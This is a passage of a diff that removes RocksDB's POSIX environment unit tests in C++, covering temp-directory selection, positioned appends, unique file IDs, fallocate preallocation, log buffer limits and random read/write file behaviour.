-  bool ok = (fd >= 0 && ioctl(fd, FS_IOC_GETVERSION, &version) >= 0);
-
-  close(fd);
-  unlink(file.c_str());
-
-  return ok;
-#endif
-}
-
-// To ensure that Env::GetUniqueId-related tests work correctly, the files
-// should be stored in regular storage like "hard disk" or "flash device",
-// and not on a tmpfs file system (like /dev/shm and /tmp on some systems).
-// Otherwise we cannot get the correct id.
-//
-// This function serves as the replacement for test::TmpDir(), which may be
-// customized to be on a file system that doesn't work with GetUniqueId().
-
-class IoctlFriendlyTmpdir {
- public:
-  explicit IoctlFriendlyTmpdir() {
-    char dir_buf[100];
-
-    const char *fmt = "%s/rocksdb.XXXXXX";
-    const char *tmp = getenv("TEST_IOCTL_FRIENDLY_TMPDIR");
-
-#ifdef OS_WIN
-#define rmdir _rmdir
-    if(tmp == nullptr) {
-      tmp = getenv("TMP");
-    }
-
-    snprintf(dir_buf, sizeof dir_buf, fmt, tmp);
-    auto result = _mktemp(dir_buf);
-    assert(result != nullptr);
-    BOOL ret = CreateDirectory(dir_buf, NULL);
-    assert(ret == TRUE);
-    dir_ = dir_buf;
-#else
-    std::list<std::string> candidate_dir_list = {"/var/tmp", "/tmp"};
-
-    // If $TEST_IOCTL_FRIENDLY_TMPDIR/rocksdb.XXXXXX fits, use
-    // $TEST_IOCTL_FRIENDLY_TMPDIR; subtract 2 for the "%s", and
-    // add 1 for the trailing NUL byte.
-    if (tmp && strlen(tmp) + strlen(fmt) - 2 + 1 <= sizeof dir_buf) {
-      // use $TEST_IOCTL_FRIENDLY_TMPDIR value
-      candidate_dir_list.push_front(tmp);
-    }
-
-    for (const std::string& d : candidate_dir_list) {
-      snprintf(dir_buf, sizeof dir_buf, fmt, d.c_str());
-      if (mkdtemp(dir_buf)) {
-        if (ioctl_support__FS_IOC_GETVERSION(dir_buf)) {
-          dir_ = dir_buf;
-          return;
-        } else {
-          // Diagnose ioctl-related failure only if this is the
-          // directory specified via that envvar.
-          if (tmp && tmp == d) {
-            fprintf(stderr, "TEST_IOCTL_FRIENDLY_TMPDIR-specified directory is "
-                    "not suitable: %s\n", d.c_str());
-          }
-          rmdir(dir_buf);  // ignore failure
-        }
-      } else {
-        // mkdtemp failed: diagnose it, but don't give up.
-        fprintf(stderr, "mkdtemp(%s/...) failed: %s\n", d.c_str(),
-                strerror(errno));
-      }
-    }
-
-    fprintf(stderr, "failed to find an ioctl-friendly temporary directory;"
-            " specify one via the TEST_IOCTL_FRIENDLY_TMPDIR envvar\n");
-    std::abort();
-#endif
-}
-
-  ~IoctlFriendlyTmpdir() {
-    rmdir(dir_.c_str());
-  }
-
-  const std::string& name() const {
-    return dir_;
-  }
-
- private:
-  std::string dir_;
-};
-
-#ifndef ROCKSDB_LITE
-TEST_F(EnvPosixTest, PositionedAppend) {
-  unique_ptr<WritableFile> writable_file;
-  EnvOptions options;
-  options.use_direct_writes = true;
-  options.use_mmap_writes = false;
-  IoctlFriendlyTmpdir ift;
-  ASSERT_OK(env_->NewWritableFile(ift.name() + "/f", &writable_file, options));
-  const size_t kBlockSize = 4096;
-  const size_t kPageSize = 4096;
-  const size_t kDataSize = kPageSize;
-  // Write a page worth of 'a'
-  auto data_ptr = NewAligned(kDataSize, 'a');
-  Slice data_a(data_ptr.get(), kDataSize);
-  ASSERT_OK(writable_file->PositionedAppend(data_a, 0U));
-  // Write a page worth of 'b' right after the first sector
-  data_ptr = NewAligned(kDataSize, 'b');
-  Slice data_b(data_ptr.get(), kDataSize);
-  ASSERT_OK(writable_file->PositionedAppend(data_b, kBlockSize));
-  ASSERT_OK(writable_file->Close());
-  // The file now has 1 sector worth of a followed by a page worth of b
-
-  // Verify the above
-  unique_ptr<SequentialFile> seq_file;
-  ASSERT_OK(env_->NewSequentialFile(ift.name() + "/f", &seq_file, options));
-  char scratch[kPageSize * 2];
-  Slice result;
-  ASSERT_OK(seq_file->Read(sizeof(scratch), &result, scratch));
-  ASSERT_EQ(kPageSize + kBlockSize, result.size());
-  ASSERT_EQ('a', result[kBlockSize - 1]);
-  ASSERT_EQ('b', result[kBlockSize]);
-}
-#endif  // !ROCKSDB_LITE
-
-// Only works in linux platforms
-TEST_P(EnvPosixTestWithParam, RandomAccessUniqueID) {
-  // Create file.
-  if (env_ == Env::Default()) {
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-    IoctlFriendlyTmpdir ift;
-    std::string fname = ift.name() + "/testfile";
-    unique_ptr<WritableFile> wfile;
-    ASSERT_OK(env_->NewWritableFile(fname, &wfile, soptions));
-
-    unique_ptr<RandomAccessFile> file;
-
-    // Get Unique ID
-    ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-    size_t id_size = file->GetUniqueId(temp_id, MAX_ID_SIZE);
-    ASSERT_TRUE(id_size > 0);
-    std::string unique_id1(temp_id, id_size);
-    ASSERT_TRUE(IsUniqueIDValid(unique_id1));
-
-    // Get Unique ID again
-    ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-    id_size = file->GetUniqueId(temp_id, MAX_ID_SIZE);
-    ASSERT_TRUE(id_size > 0);
-    std::string unique_id2(temp_id, id_size);
-    ASSERT_TRUE(IsUniqueIDValid(unique_id2));
-
-    // Get Unique ID again after waiting some time.
-    env_->SleepForMicroseconds(1000000);
-    ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-    id_size = file->GetUniqueId(temp_id, MAX_ID_SIZE);
-    ASSERT_TRUE(id_size > 0);
-    std::string unique_id3(temp_id, id_size);
-    ASSERT_TRUE(IsUniqueIDValid(unique_id3));
-
-    // Check IDs are the same.
-    ASSERT_EQ(unique_id1, unique_id2);
-    ASSERT_EQ(unique_id2, unique_id3);
-
-    // Delete the file
-    env_->DeleteFile(fname);
-  }
-}
-
-// only works in linux platforms
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-TEST_P(EnvPosixTestWithParam, AllocateTest) {
-  if (env_ == Env::Default()) {
-    IoctlFriendlyTmpdir ift;
-    std::string fname = ift.name() + "/preallocate_testfile";
-
-    // Try fallocate in a file to see whether the target file system supports
-    // it.
-    // Skip the test if fallocate is not supported.
-    std::string fname_test_fallocate = ift.name() + "/preallocate_testfile_2";
-    int fd = -1;
-    do {
-      fd = open(fname_test_fallocate.c_str(), O_CREAT | O_RDWR | O_TRUNC, 0644);
-    } while (fd < 0 && errno == EINTR);
-    ASSERT_GT(fd, 0);
-
-    int alloc_status = fallocate(fd, 0, 0, 1);
-
-    int err_number = 0;
-    if (alloc_status != 0) {
-      err_number = errno;
-      fprintf(stderr, "Warning: fallocate() fails, %s\n", strerror(err_number));
-    }
-    close(fd);
-    ASSERT_OK(env_->DeleteFile(fname_test_fallocate));
-    if (alloc_status != 0 && err_number == EOPNOTSUPP) {
-      // The filesystem containing the file does not support fallocate
-      return;
-    }
-
-    EnvOptions soptions;
-    soptions.use_mmap_writes = false;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-    unique_ptr<WritableFile> wfile;
-    ASSERT_OK(env_->NewWritableFile(fname, &wfile, soptions));
-
-    // allocate 100 MB
-    size_t kPreallocateSize = 100 * 1024 * 1024;
-    size_t kBlockSize = 512;
-    size_t kPageSize = 4096;
-    size_t kDataSize = 1024 * 1024;
-    auto data_ptr = NewAligned(kDataSize, 'A');
-    Slice data(data_ptr.get(), kDataSize);
-    wfile->SetPreallocationBlockSize(kPreallocateSize);
-    wfile->PrepareWrite(wfile->GetFileSize(), kDataSize);
-    ASSERT_OK(wfile->Append(data));
-    ASSERT_OK(wfile->Flush());
-
-    struct stat f_stat;
-    ASSERT_EQ(stat(fname.c_str(), &f_stat), 0);
-    ASSERT_EQ((unsigned int)kDataSize, f_stat.st_size);
-    // verify that blocks are preallocated
-    // Note here that we don't check the exact number of blocks preallocated --
-    // we only require that number of allocated blocks is at least what we
-    // expect.
-    // It looks like some FS give us more blocks that we asked for. That's fine.
-    // It might be worth investigating further.
-    ASSERT_LE((unsigned int)(kPreallocateSize / kBlockSize), f_stat.st_blocks);
-
-    // close the file, should deallocate the blocks
-    wfile.reset();
-
-    stat(fname.c_str(), &f_stat);
-    ASSERT_EQ((unsigned int)kDataSize, f_stat.st_size);
-    // verify that preallocated blocks were deallocated on file close
-    // Because the FS might give us more blocks, we add a full page to the size
-    // and expect the number of blocks to be less or equal to that.
-    ASSERT_GE((f_stat.st_size + kPageSize + kBlockSize - 1) / kBlockSize,
-              (unsigned int)f_stat.st_blocks);
-  }
-}
-#endif  // ROCKSDB_FALLOCATE_PRESENT
-
-// Returns true if any of the strings in ss are the prefix of another string.
-bool HasPrefix(const std::unordered_set<std::string>& ss) {
-  for (const std::string& s: ss) {
-    if (s.empty()) {
-      return true;
-    }
-    for (size_t i = 1; i < s.size(); ++i) {
-      if (ss.count(s.substr(0, i)) != 0) {
-        return true;
-      }
-    }
-  }
-  return false;
-}
-
-// Only works in linux and WIN platforms
-TEST_P(EnvPosixTestWithParam, RandomAccessUniqueIDConcurrent) {
-  if (env_ == Env::Default()) {
-    // Check whether a bunch of concurrently existing files have unique IDs.
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-
-    // Create the files
-    IoctlFriendlyTmpdir ift;
-    std::vector<std::string> fnames;
-    for (int i = 0; i < 1000; ++i) {
-      fnames.push_back(ift.name() + "/" + "testfile" + ToString(i));
-
-      // Create file.
-      unique_ptr<WritableFile> wfile;
-      ASSERT_OK(env_->NewWritableFile(fnames[i], &wfile, soptions));
-    }
-
-    // Collect and check whether the IDs are unique.
-    std::unordered_set<std::string> ids;
-    for (const std::string fname : fnames) {
-      unique_ptr<RandomAccessFile> file;
-      std::string unique_id;
-      ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-      size_t id_size = file->GetUniqueId(temp_id, MAX_ID_SIZE);
-      ASSERT_TRUE(id_size > 0);
-      unique_id = std::string(temp_id, id_size);
-      ASSERT_TRUE(IsUniqueIDValid(unique_id));
-
-      ASSERT_TRUE(ids.count(unique_id) == 0);
-      ids.insert(unique_id);
-    }
-
-    // Delete the files
-    for (const std::string fname : fnames) {
-      ASSERT_OK(env_->DeleteFile(fname));
-    }
-
-    ASSERT_TRUE(!HasPrefix(ids));
-  }
-}
-
-// Only works in linux and WIN platforms
-TEST_P(EnvPosixTestWithParam, RandomAccessUniqueIDDeletes) {
-  if (env_ == Env::Default()) {
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-
-    IoctlFriendlyTmpdir ift;
-    std::string fname = ift.name() + "/" + "testfile";
-
-    // Check that after file is deleted we don't get same ID again in a new
-    // file.
-    std::unordered_set<std::string> ids;
-    for (int i = 0; i < 1000; ++i) {
-      // Create file.
-      {
-        unique_ptr<WritableFile> wfile;
-        ASSERT_OK(env_->NewWritableFile(fname, &wfile, soptions));
-      }
-
-      // Get Unique ID
-      std::string unique_id;
-      {
-        unique_ptr<RandomAccessFile> file;
-        ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-        size_t id_size = file->GetUniqueId(temp_id, MAX_ID_SIZE);
-        ASSERT_TRUE(id_size > 0);
-        unique_id = std::string(temp_id, id_size);
-      }
-
-      ASSERT_TRUE(IsUniqueIDValid(unique_id));
-      ASSERT_TRUE(ids.count(unique_id) == 0);
-      ids.insert(unique_id);
-
-      // Delete the file
-      ASSERT_OK(env_->DeleteFile(fname));
-    }
-
-    ASSERT_TRUE(!HasPrefix(ids));
-  }
-}
-
-// Only works in linux platforms
-#ifdef OS_WIN
-TEST_P(EnvPosixTestWithParam, DISABLED_InvalidateCache) {
-#else
-TEST_P(EnvPosixTestWithParam, InvalidateCache) {
-#endif
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-    std::string fname = test::TmpDir(env_) + "/" + "testfile";
-
-    const size_t kSectorSize = 512;
-    auto data = NewAligned(kSectorSize, 0);
-    Slice slice(data.get(), kSectorSize);
-
-    // Create file.
-    {
-      unique_ptr<WritableFile> wfile;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && !defined(OS_AIX)
-      if (soptions.use_direct_writes) {
-        soptions.use_direct_writes = false;
-      }
-#endif
-      ASSERT_OK(env_->NewWritableFile(fname, &wfile, soptions));
-      ASSERT_OK(wfile->Append(slice));
-      ASSERT_OK(wfile->InvalidateCache(0, 0));
-      ASSERT_OK(wfile->Close());
-    }
-
-    // Random Read
-    {
-      unique_ptr<RandomAccessFile> file;
-      auto scratch = NewAligned(kSectorSize, 0);
-      Slice result;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && !defined(OS_AIX)
-      if (soptions.use_direct_reads) {
-        soptions.use_direct_reads = false;
-      }
-#endif
-      ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-      ASSERT_OK(file->Read(0, kSectorSize, &result, scratch.get()));
-      ASSERT_EQ(memcmp(scratch.get(), data.get(), kSectorSize), 0);
-      ASSERT_OK(file->InvalidateCache(0, 11));
-      ASSERT_OK(file->InvalidateCache(0, 0));
-    }
-
-    // Sequential Read
-    {
-      unique_ptr<SequentialFile> file;
-      auto scratch = NewAligned(kSectorSize, 0);
-      Slice result;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && !defined(OS_AIX)
-      if (soptions.use_direct_reads) {
-        soptions.use_direct_reads = false;
-      }
-#endif
-      ASSERT_OK(env_->NewSequentialFile(fname, &file, soptions));
-      if (file->use_direct_io()) {
-        ASSERT_OK(file->PositionedRead(0, kSectorSize, &result, scratch.get()));
-      } else {
-        ASSERT_OK(file->Read(kSectorSize, &result, scratch.get()));
-      }
-      ASSERT_EQ(memcmp(scratch.get(), data.get(), kSectorSize), 0);
-      ASSERT_OK(file->InvalidateCache(0, 11));
-      ASSERT_OK(file->InvalidateCache(0, 0));
-    }
-    // Delete the file
-    ASSERT_OK(env_->DeleteFile(fname));
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-}
-#endif  // not TRAVIS
-#endif  // OS_LINUX || OS_WIN
-
-class TestLogger : public Logger {
- public:
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    log_count++;
-
-    char new_format[550];
-    std::fill_n(new_format, sizeof(new_format), '2');
-    {
-      va_list backup_ap;
-      va_copy(backup_ap, ap);
-      int n = vsnprintf(new_format, sizeof(new_format) - 1, format, backup_ap);
-      // 48 bytes for extra information + bytes allocated
-
-// When we have n == -1 there is not a terminating zero expected
-#ifdef OS_WIN
-      if (n < 0) {
-        char_0_count++;
-      }
-#endif
-
-      if (new_format[0] == '[') {
-        // "[DEBUG] "
-        ASSERT_TRUE(n <= 56 + (512 - static_cast<int>(sizeof(struct timeval))));
-      } else {
-        ASSERT_TRUE(n <= 48 + (512 - static_cast<int>(sizeof(struct timeval))));
-      }
-      va_end(backup_ap);
-    }
-
-    for (size_t i = 0; i < sizeof(new_format); i++) {
-      if (new_format[i] == 'x') {
-        char_x_count++;
-      } else if (new_format[i] == '\0') {
-        char_0_count++;
-      }
-    }
-  }
-  int log_count;
-  int char_x_count;
-  int char_0_count;
-};
-
-TEST_P(EnvPosixTestWithParam, LogBufferTest) {
-  TestLogger test_logger;
-  test_logger.SetInfoLogLevel(InfoLogLevel::INFO_LEVEL);
-  test_logger.log_count = 0;
-  test_logger.char_x_count = 0;
-  test_logger.char_0_count = 0;
-  LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL, &test_logger);
-  LogBuffer log_buffer_debug(DEBUG_LEVEL, &test_logger);
-
-  char bytes200[200];
-  std::fill_n(bytes200, sizeof(bytes200), '1');
-  bytes200[sizeof(bytes200) - 1] = '\0';
-  char bytes600[600];
-  std::fill_n(bytes600, sizeof(bytes600), '1');
-  bytes600[sizeof(bytes600) - 1] = '\0';
-  char bytes9000[9000];
-  std::fill_n(bytes9000, sizeof(bytes9000), '1');
-  bytes9000[sizeof(bytes9000) - 1] = '\0';
-
-  ROCKS_LOG_BUFFER(&log_buffer, "x%sx", bytes200);
-  ROCKS_LOG_BUFFER(&log_buffer, "x%sx", bytes600);
-  ROCKS_LOG_BUFFER(&log_buffer, "x%sx%sx%sx", bytes200, bytes200, bytes200);
-  ROCKS_LOG_BUFFER(&log_buffer, "x%sx%sx", bytes200, bytes600);
-  ROCKS_LOG_BUFFER(&log_buffer, "x%sx%sx", bytes600, bytes9000);
-
-  ROCKS_LOG_BUFFER(&log_buffer_debug, "x%sx", bytes200);
-  test_logger.SetInfoLogLevel(DEBUG_LEVEL);
-  ROCKS_LOG_BUFFER(&log_buffer_debug, "x%sx%sx%sx", bytes600, bytes9000,
-                   bytes200);
-
-  ASSERT_EQ(0, test_logger.log_count);
-  log_buffer.FlushBufferToLog();
-  log_buffer_debug.FlushBufferToLog();
-  ASSERT_EQ(6, test_logger.log_count);
-  ASSERT_EQ(6, test_logger.char_0_count);
-  ASSERT_EQ(10, test_logger.char_x_count);
-}
-
-class TestLogger2 : public Logger {
- public:
-  explicit TestLogger2(size_t max_log_size) : max_log_size_(max_log_size) {}
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    char new_format[2000];
-    std::fill_n(new_format, sizeof(new_format), '2');
-    {
-      va_list backup_ap;
-      va_copy(backup_ap, ap);
-      int n = vsnprintf(new_format, sizeof(new_format) - 1, format, backup_ap);
-      // 48 bytes for extra information + bytes allocated
-      ASSERT_TRUE(
-          n <= 48 + static_cast<int>(max_log_size_ - sizeof(struct timeval)));
-      ASSERT_TRUE(n > static_cast<int>(max_log_size_ - sizeof(struct timeval)));
-      va_end(backup_ap);
-    }
-  }
-  size_t max_log_size_;
-};
-
-TEST_P(EnvPosixTestWithParam, LogBufferMaxSizeTest) {
-  char bytes9000[9000];
-  std::fill_n(bytes9000, sizeof(bytes9000), '1');
-  bytes9000[sizeof(bytes9000) - 1] = '\0';
-
-  for (size_t max_log_size = 256; max_log_size <= 1024;
-       max_log_size += 1024 - 256) {
-    TestLogger2 test_logger(max_log_size);
-    test_logger.SetInfoLogLevel(InfoLogLevel::INFO_LEVEL);
-    LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL, &test_logger);
-    ROCKS_LOG_BUFFER_MAX_SZ(&log_buffer, max_log_size, "%s", bytes9000);
-    log_buffer.FlushBufferToLog();
-  }
-}
-
-TEST_P(EnvPosixTestWithParam, Preallocation) {
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-    const std::string src = test::TmpDir(env_) + "/" + "testfile";
-    unique_ptr<WritableFile> srcfile;
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && !defined(OS_AIX)
-    if (soptions.use_direct_writes) {
-      rocksdb::SyncPoint::GetInstance()->SetCallBack(
-          "NewWritableFile:O_DIRECT", [&](void* arg) {
-            int* val = static_cast<int*>(arg);
-            *val &= ~O_DIRECT;
-          });
-    }
-#endif
-    ASSERT_OK(env_->NewWritableFile(src, &srcfile, soptions));
-    srcfile->SetPreallocationBlockSize(1024 * 1024);
-
-    // No writes should mean no preallocation
-    size_t block_size, last_allocated_block;
-    srcfile->GetPreallocationStatus(&block_size, &last_allocated_block);
-    ASSERT_EQ(last_allocated_block, 0UL);
-
-    // Small write should preallocate one block
-    size_t kStrSize = 4096;
-    auto data = NewAligned(kStrSize, 'A');
-    Slice str(data.get(), kStrSize);
-    srcfile->PrepareWrite(srcfile->GetFileSize(), kStrSize);
-    srcfile->Append(str);
-    srcfile->GetPreallocationStatus(&block_size, &last_allocated_block);
-    ASSERT_EQ(last_allocated_block, 1UL);
-
-    // Write an entire preallocation block, make sure we increased by two.
-    {
-      auto buf_ptr = NewAligned(block_size, ' ');
-      Slice buf(buf_ptr.get(), block_size);
-      srcfile->PrepareWrite(srcfile->GetFileSize(), block_size);
-      srcfile->Append(buf);
-      srcfile->GetPreallocationStatus(&block_size, &last_allocated_block);
-      ASSERT_EQ(last_allocated_block, 2UL);
-    }
-
-    // Write five more blocks at once, ensure we're where we need to be.
-    {
-      auto buf_ptr = NewAligned(block_size * 5, ' ');
-      Slice buf = Slice(buf_ptr.get(), block_size * 5);
-      srcfile->PrepareWrite(srcfile->GetFileSize(), buf.size());
-      srcfile->Append(buf);
-      srcfile->GetPreallocationStatus(&block_size, &last_allocated_block);
-      ASSERT_EQ(last_allocated_block, 7UL);
-    }
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-}
-
-// Test that the two ways to get children file attributes (in bulk or
-// individually) behave consistently.
-TEST_P(EnvPosixTestWithParam, ConsistentChildrenAttributes) {
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-    const int kNumChildren = 10;
-
-    std::string data;
-    for (int i = 0; i < kNumChildren; ++i) {
-      std::ostringstream oss;
-      oss << test::TmpDir(env_) << "/testfile_" << i;
-      const std::string path = oss.str();
-      unique_ptr<WritableFile> file;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && !defined(OS_AIX)
-      if (soptions.use_direct_writes) {
-        rocksdb::SyncPoint::GetInstance()->SetCallBack(
-            "NewWritableFile:O_DIRECT", [&](void* arg) {
-              int* val = static_cast<int*>(arg);
-              *val &= ~O_DIRECT;
-            });
-      }
-#endif
-      ASSERT_OK(env_->NewWritableFile(path, &file, soptions));
-      auto buf_ptr = NewAligned(data.size(), 'T');
-      Slice buf(buf_ptr.get(), data.size());
-      file->Append(buf);
-      data.append(std::string(4096, 'T'));
-    }
-
-    std::vector<Env::FileAttributes> file_attrs;
-    ASSERT_OK(env_->GetChildrenFileAttributes(test::TmpDir(env_), &file_attrs));
-    for (int i = 0; i < kNumChildren; ++i) {
-      std::ostringstream oss;
-      oss << "testfile_" << i;
-      const std::string name = oss.str();
-      const std::string path = test::TmpDir(env_) + "/" + name;
-
-      auto file_attrs_iter = std::find_if(
-          file_attrs.begin(), file_attrs.end(),
-          [&name](const Env::FileAttributes& fm) { return fm.name == name; });
-      ASSERT_TRUE(file_attrs_iter != file_attrs.end());
-      uint64_t size;
-      ASSERT_OK(env_->GetFileSize(path, &size));
-      ASSERT_EQ(size, 4096 * i);
-      ASSERT_EQ(size, file_attrs_iter->size_bytes);
-    }
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-}
-
-// Test that all WritableFileWrapper forwards all calls to WritableFile.
-TEST_P(EnvPosixTestWithParam, WritableFileWrapper) {
-  class Base : public WritableFile {
-   public:
-    mutable int *step_;
-
-    void inc(int x) const {
-      EXPECT_EQ(x, (*step_)++);
-    }
-
-    explicit Base(int* step) : step_(step) {
-      inc(0);
-    }
-
-    Status Append(const Slice& data) override { inc(1); return Status::OK(); }
-    Status Truncate(uint64_t size) override { return Status::OK(); }
-    Status Close() override { inc(2); return Status::OK(); }
-    Status Flush() override { inc(3); return Status::OK(); }
-    Status Sync() override { inc(4); return Status::OK(); }
-    Status Fsync() override { inc(5); return Status::OK(); }
-    void SetIOPriority(Env::IOPriority pri) override { inc(6); }
-    uint64_t GetFileSize() override { inc(7); return 0; }
-    void GetPreallocationStatus(size_t* block_size,
-                                size_t* last_allocated_block) override {
-      inc(8);
-    }
-    size_t GetUniqueId(char* id, size_t max_size) const override {
-      inc(9);
-      return 0;
-    }
-    Status InvalidateCache(size_t offset, size_t length) override {
-      inc(10);
-      return Status::OK();
-    }
-
-   protected:
-    Status Allocate(uint64_t offset, uint64_t len) override {
-      inc(11);
-      return Status::OK();
-    }
-    Status RangeSync(uint64_t offset, uint64_t nbytes) override {
-      inc(12);
-      return Status::OK();
-    }
-
-   public:
-    ~Base() {
-      inc(13);
-    }
-  };
-
-  class Wrapper : public WritableFileWrapper {
-   public:
-    explicit Wrapper(WritableFile* target) : WritableFileWrapper(target) {}
-
-    void CallProtectedMethods() {
-      Allocate(0, 0);
-      RangeSync(0, 0);
-    }
-  };
-
-  int step = 0;
-
-  {
-    Base b(&step);
-    Wrapper w(&b);
-    w.Append(Slice());
-    w.Close();
-    w.Flush();
-    w.Sync();
-    w.Fsync();
-    w.SetIOPriority(Env::IOPriority::IO_HIGH);
-    w.GetFileSize();
-    w.GetPreallocationStatus(nullptr, nullptr);
-    w.GetUniqueId(nullptr, 0);
-    w.InvalidateCache(0, 0);
-    w.CallProtectedMethods();
-  }
-
-  EXPECT_EQ(14, step);
-}
-
-TEST_P(EnvPosixTestWithParam, PosixRandomRWFile) {
-  const std::string path = test::TmpDir(env_) + "/random_rw_file";
-
-  env_->DeleteFile(path);
-
-  std::unique_ptr<RandomRWFile> file;
-  ASSERT_OK(env_->NewRandomRWFile(path, &file, EnvOptions()));
-
-  char buf[10000];
-  Slice read_res;
-
-  ASSERT_OK(file->Write(0, "ABCD"));
-  ASSERT_OK(file->Read(0, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ABCD");
-
-  ASSERT_OK(file->Write(2, "XXXX"));
-  ASSERT_OK(file->Read(0, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ABXXXX");
-
-  ASSERT_OK(file->Write(10, "ZZZ"));
-  ASSERT_OK(file->Read(10, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ZZZ");
-
-  ASSERT_OK(file->Write(11, "Y"));
-  ASSERT_OK(file->Read(10, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ZYZ");
-
-  ASSERT_OK(file->Write(200, "FFFFF"));
-  ASSERT_OK(file->Read(200, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "FFFFF");
-
-  ASSERT_OK(file->Write(205, "XXXX"));
-  ASSERT_OK(file->Read(200, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "FFFFFXXXX");
-
-  ASSERT_OK(file->Write(5, "QQQQ"));
-  ASSERT_OK(file->Read(0, 9, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ABXXXQQQQ");
-
-  ASSERT_OK(file->Read(2, 4, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "XXXQ");
-
-  // Close file and reopen it
-  file->Close();
-  ASSERT_OK(env_->NewRandomRWFile(path, &file, EnvOptions()));
-
-  ASSERT_OK(file->Read(0, 9, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ABXXXQQQQ");
-
-  ASSERT_OK(file->Read(10, 3, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ZYZ");
-
-  ASSERT_OK(file->Read(200, 9, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "FFFFFXXXX");
-
-  ASSERT_OK(file->Write(4, "TTTTTTTTTTTTTTTT"));
-  ASSERT_OK(file->Read(0, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ABXXTTTTTT");
-
-  // Clean up
-  env_->DeleteFile(path);
-}
-
-class RandomRWFileWithMirrorString {
- public:
-  explicit RandomRWFileWithMirrorString(RandomRWFile* _file) : file_(_file) {}
-
-  void Write(size_t offset, const std::string& data) {
-    // Write to mirror string
-    StringWrite(offset, data);
-
-    // Write to file
-    Status s = file_->Write(offset, data);
-    ASSERT_OK(s) << s.ToString();
-  }
-
-  void Read(size_t offset = 0, size_t n = 1000000) {
-    Slice str_res(nullptr, 0);
-    if (offset < file_mirror_.size()) {
-      size_t str_res_sz = std::min(file_mirror_.size() - offset, n);
-      str_res = Slice(file_mirror_.data() + offset, str_res_sz);
-      StopSliceAtNull(&str_res);
-    }
-
-    Slice file_res;
-    Status s = file_->Read(offset, n, &file_res, buf_);
-    ASSERT_OK(s) << s.ToString();
-    StopSliceAtNull(&file_res);
-
-    ASSERT_EQ(str_res.ToString(), file_res.ToString()) << offset << " " << n;
-  }
-
-  void SetFile(RandomRWFile* _file) { file_ = _file; }
-
- private:
-  void StringWrite(size_t offset, const std::string& src) {
-    if (offset + src.size() > file_mirror_.size()) {
-      file_mirror_.resize(offset + src.size(), '\0');
-    }
-
-    char* pos = const_cast<char*>(file_mirror_.data() + offset);
-    memcpy(pos, src.data(), src.size());
-  }
-
-  void StopSliceAtNull(Slice* slc) {
-    for (size_t i = 0; i < slc->size(); i++) {
-      if ((*slc)[i] == '\0') {
-        *slc = Slice(slc->data(), i);
-        break;
-      }
-    }
-  }
-
-  char buf_[10000];
-  RandomRWFile* file_;
-  std::string file_mirror_;
-};
-
-TEST_P(EnvPosixTestWithParam, PosixRandomRWFileRandomized) {
-  const std::string path = test::TmpDir(env_) + "/random_rw_file_rand";
-  env_->DeleteFile(path);
-
-  unique_ptr<RandomRWFile> file;
-  ASSERT_OK(env_->NewRandomRWFile(path, &file, EnvOptions()));
-  RandomRWFileWithMirrorString file_with_mirror(file.get());
-
-  Random rnd(301);
-  std::string buf;
-  for (int i = 0; i < 10000; i++) {
-    // Genrate random data
-    test::RandomString(&rnd, 10, &buf);
-
-    // Pick random offset for write
-    size_t write_off = rnd.Next() % 1000;
-    file_with_mirror.Write(write_off, buf);
-
-    // Pick random offset for read
-    size_t read_off = rnd.Next() % 1000;
-    size_t read_sz = rnd.Next() % 20;
-    file_with_mirror.Read(read_off, read_sz);
-
-    if (i % 500 == 0) {
-      // Reopen the file every 500 iters
-      ASSERT_OK(env_->NewRandomRWFile(path, &file, EnvOptions()));
-      file_with_mirror.SetFile(file.get());
-    }
-  }
-
-  // clean up
-  env_->DeleteFile(path);
-}
-
-INSTANTIATE_TEST_CASE_P(DefaultEnvWithoutDirectIO, EnvPosixTestWithParam,
-                        ::testing::Values(std::pair<Env*, bool>(Env::Default(),
-                                                                false)));
